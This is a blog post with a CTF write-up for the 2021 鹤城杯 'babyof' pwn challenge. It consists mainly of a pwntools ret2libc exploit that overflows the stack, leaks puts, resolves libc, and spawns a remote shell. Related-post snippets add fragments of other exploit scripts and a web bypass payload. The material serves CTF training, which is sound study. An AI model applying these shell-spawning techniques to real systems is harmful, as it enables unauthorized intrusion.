[2021 鹤城杯]babyof(libc泄露)

最新推荐文章于 2024-11-11 21:47:34 发布
最新推荐文章于 2024-11-11 21:47:34 发布
阅读量537 收藏 9
点赞数 6
分类专栏: pwn刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74355719/article/details/134698584
版权

main:0x40066B

pop_rdi=0x400743

ret=0x400506

from pwn import *
from LibcSearcher import *

p=remote('node4.anna.nssctf.cn',28447)
elf=ELF('/home/kali/Desktop/babyof')

ret_addr=0x400506
pop_rdi=0x400743
main_addr=0x40066B
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

payload=b'a'*72+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendlineafter('overflow?\n',payload)
puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc=LibcSearcher('puts',puts_addr)
libc_addr=puts_addr-libc.dump('puts')
binsh=libc_addr+libc.dump('str_bin_sh')
system=libc_addr+libc.dump('system')
payload=b'a'*72+p64(ret_addr)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendlineafter('overflow?\n',payload)

p.interactive()

libc6_2.27-3ubuntu1.4_amd64

b1n8
关注
专栏目录
2021鹤城pwn部分wp
eeeeeight的博客
10-09 2144
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
【pwn】2021 鹤壁 wp
woodwhale的博客
10-09 3792
【pwn】2021 鹤壁 wp 前言 这场比较简单,但是也看到了自己急于求成的下场,基础知识非常不牢固,很多调试手段都太拉了,逆向能力也是非常差,还是得跟着师傅们继续学啊! 1、ret2libc1 就是最简单的ret2libc1,好像还有后门,我给忘了 2、ret2libc3 也是基本的ret2libc3,puts.plt泄露puts.got从而泄露libc.address,system(“sh”) 要注意一下栈平衡,在rop之前加个ret 3、onecho 这题,虽然很简单,但是我太拉了,不会动调,导致
【PWN · ret2libc】[2021 鹤城]babyof
Mr_Fmnwon的博客
05-30 2341
64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')
NSSCTF刷题笔记pwn10——[2021 鹤城]babyof
qq_45692883的博客
02-02 384
朴实无华的栈溢出,没有system函数,也没有/bin/sh字符串,也没有给libc文件。这是通过libcsearcher获取偏移的代码,可惜在这题好像行不通,但是思路是这样子的。通过泄露目标的函数地址,我可以确定目标使用的是这两个libc文件。然后是修改过后的代码,基本上没差。但是我们有puts可以泄露数据。
[2021 鹤城]babyof全网最详细
qq_41937545的博客
10-13 455
[2021 鹤城]babyof全网最详细
首届“鹤城”河南·鹤壁CTF网络安全挑战赛部分WP
七堇年的博客
12-24 2663
首届“鹤城”河南·鹤壁CTF网络安全挑战赛WP
NSS刷题(1-5页)
2302_79813730的博客
07-20 822
大概都有吧,一些nc题没有,题的顺序因为提前没有规划,也不好整理,凑合着看吧,题号基本都是对的。
libc.so.6 libc.so.6
05-31
《深入理解Linux动态链接库:以libc.so.6为例》 在Linux系统中,`libc.so.6`是一个至关重要的动态链接库,全称为“GNU C Library”,它提供了大量用于程序开发的基础函数,如字符串处理、内存管理、I/O操作等。这个...
[2021 鹤城]littleof [泄露canary,libc] 总结
qq_48466156的博客
06-15 346
[2021 鹤城]littleof [泄露canary,libc] 总结
【pwn】2021 祥云 (部分)
woodwhale的博客
10-07 4250
【pwn】2021 祥云 (部分) 前言 国庆的最后几天,一直在补题,发现祥云那个时候一道堆题都不会,直接开始补题。 补题过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云里最简单的题目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn题堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
鹤城PWN几道题的writeup
10-09 616
目录 babyof easyecho littleof onecho babyof #encoding=utf-8 from pwn import * context(os='linux',arch='amd64') fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof' r = process(fpath) #r = remote("182.116.62.85",21613) elf = ELF(fpath) libc =elf.libc poprd
首届"鹤城"CTF网络安全挑战赛 - 初赛writeup
渗透测试研究中心
12-22 2178
WEB1.middle_magic%0a绕过第一关最后加%23是#数组绕过第二关json 弱类型比较http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23POST:admin[]=1&root_pwd[]=2&level_3={"result":0}flag{f03d41bf6c8d55f12324fd57f7a00427}2...
2021-鹤城部分Wp by Rewrite
Re_ly0n的博客
10-09 1358
Web狗的我今天上午满课,下午两节课,抽时间做了两个web,u1s1,两个web都是原题,pwn????刚开始pwn本地全部打通了,然后远程死活不通,最后跑路永劫无间了。哈哈哈哈 WEB MIDDLE_MAGIC %0a绕过第一关最后加%23是# 数组绕过第二关 json 弱类型比较 payload GET aaa=%0apass_the_level_1%23 POST admin[]=1&root_pwd[]=2&level_3={"result":0} SPRING
libc-2.24源代码
02-06
libc-2.24源代码
AI与隐私:Facebook如何在数据保护中平衡创新与安全
2301_78954254的博客
11-07 621
在快速发展的数字时代,人工智能(AI)技术的应用正在为社交媒体平台带来前所未有的创新。然而,伴随着技术的进步,用户的隐私保护问题也愈加凸显。作为全球最大的社交网络之一,Facebook在推动AI技术应用的同时,必须面对如何在数据保护中实现创新与安全的平衡。本文将探讨Facebook在这一领域的策略和实践。
FileLink跨网文件安全摆渡系统——企业数据流转的安全桥梁
weixin_44264342的博客
11-11 639
随着企业信息化建设的不断推进,跨网文件传输的需求日益增长,FileLink跨网文件安全摆渡系统通过全方位的安全保障与高效传输能力,成为企业解决跨网文件传输难题的理想选择。无论是对数据的加密保护、权限管理、合规审计,还是对传输效率的优化,FileLink都能够提供全面的解决方案,确保文件在内外网之间的安全、高效流转。如果您的企业正面临跨网文件传输的挑战,不妨选择FileLink,让它成为您企业数据流转的安全桥梁,助力企业信息流通的高效性和安全性,为您的业务发展保驾护航。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 369
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
网络安全---安全见闻2
最新发布
久恙502的博客
11-11 509
拓宽视野不仅能够丰富我们的知识体系,也是自我提升和深造学习的重要途径!!!
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1207
信息安全工程师——操作系统安全概述篇
【AI写作宝-注册安全分析报告-无验证方式导致安全隐患】
11-08 606
AI写作宝是一款基于人工智能技术的在线写作辅助工具,由合肥风平网络信息科技有限公司开发。它旨在帮助用户提升写作效率,通过AI技术自动生成文章、文案、作文等,适用于多种写作场景。该网站好像属于灰色地带的业务, 网站介绍什么的都没有,更容易被黑客攻击, 好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值